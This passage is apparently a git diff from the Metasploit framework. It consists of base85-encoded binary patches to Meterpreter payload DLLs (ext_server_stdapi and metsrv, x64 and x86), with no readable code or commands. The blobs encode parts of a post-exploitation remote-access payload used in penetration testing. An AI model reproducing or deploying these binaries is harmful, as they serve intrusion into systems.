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 NCVaND&PgbZ`8%}j91j2h diff --git a/data/meterpreter/ext_server_stdapi.x64.dll b/data/meterpreter/ext_server_stdapi.x64.dll index afc03f53a6f1723109aa98b7b01692fc10f0dff9..d298f5525ec761cbb55e6ba4694cceee8368b931 100755 GIT binary patch delta 56 zcmZpeAlWcMa)SgT^O}DhlcgDbng2VoH)k`pXETB@6A&|R&t_!dyaQ6uUVfKld-+|~ G&MW{c?-Ymt delta 56 zcmZpeAlWcMa)SgTv#DmnWNAiU<^$8%nzI?(vl&5{35c1uXEU;J-T^6SFTcyOz5Fg~ GXBGh4IT5u0 diff --git a/data/meterpreter/ext_server_stdapi.x86.dll b/data/meterpreter/ext_server_stdapi.x86.dll index 130e10e17511bf37894821a22b2245a9e376447b..747a9697261347bb3dd1183692e6dae516cab456 100755 GIT binary patch delta 66 zcmZo@5pQS_-=M(A9QUtdvNEGDN7G6+1||ju#_0=wvq&^gU~Hej2*ON2%)EU9Ba28U QNNM}>E|%@fyI3R50m9K0=l}o! delta 66 zcmZo@5pQS_-=M(AT&IyRS((w7qu?(q0}}%S<Mai;StOb#Ft$%%1Yss1X5K!5kwv7F SxmF{geR&tl_T^oyk>&uE7!+&( 
diff --git a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll index b2185a8370bae6b30c5077b7febbde6263a1f514..d1db92c52b46a4213738d4e63b0b47a9b6837bf2 100755 GIT binary patch delta 148889 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 